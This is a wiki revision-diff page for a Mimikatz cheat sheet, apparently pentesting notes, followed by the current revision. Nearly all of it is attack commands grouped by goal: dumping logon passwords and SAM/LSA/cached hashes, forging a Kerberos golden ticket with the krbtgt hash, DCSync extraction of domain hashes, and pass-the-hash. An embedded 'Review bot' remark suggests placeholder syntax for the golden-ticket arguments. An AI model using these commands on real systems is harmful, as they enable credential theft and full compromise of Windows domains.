Mimikatz: Difference between revisions
(Created page with "=== Steal creds === * privilege::debug * sekurlsa::logonpasswords === Dump Hashes === * token::elevate * lsadump::sam * lsadump::lsa /patch * lsadump::lsa /inject * lsadump::cache * sekurlsa::ekeys === Create a golden ticket on DC === * privilege::debug * lsadump::lsa /inject /name:krbtgt * kerberos::golden /user:administrator /domain:ulaser /sid: /krbtgt: /id: * misc::cmd === Retrieve the password hashes of user accounts from a domain controller === * lsadump::dcsync...")
Line 13: | Line 13: | ||
* privilege::debug | * privilege::debug | ||
* lsadump::lsa /inject /name:krbtgt | * lsadump::lsa /inject /name:krbtgt | ||
* kerberos::golden /user: | * kerberos::golden /user: /domain: /sid: /krbtgt: /id: | ||
* misc::cmd | * misc::cmd | ||
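Review bot: the revised `kerberos::golden` line leaves `/user: /domain: /sid: /krbtgt: /id:` as bare empty arguments, so it reads as a literal command rather than a template. Mark each one as a placeholder (for example `/user:<user>`) and state once on the page that angle-bracket values are to be filled in, so this line is unambiguous and the convention is explicit.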
Revision as of 22:14, 24 June 2023
Steal creds
- privilege::debug
- sekurlsa::logonpasswords
Dump Hashes
- token::elevate
- lsadump::sam
- lsadump::lsa /patch
- lsadump::lsa /inject
- lsadump::cache
- sekurlsa::ekeys
Create a golden ticket on DC
- privilege::debug
- lsadump::lsa /inject /name:krbtgt
- kerberos::golden /user: /domain: /sid: /krbtgt: /id:
- misc::cmd
Retrieve the password hashes of user accounts from a domain controller
- lsadump::dcsync /user:
Pass the Hash
- sekurlsa::pth /user: /domain: /ntlm: /run:cmd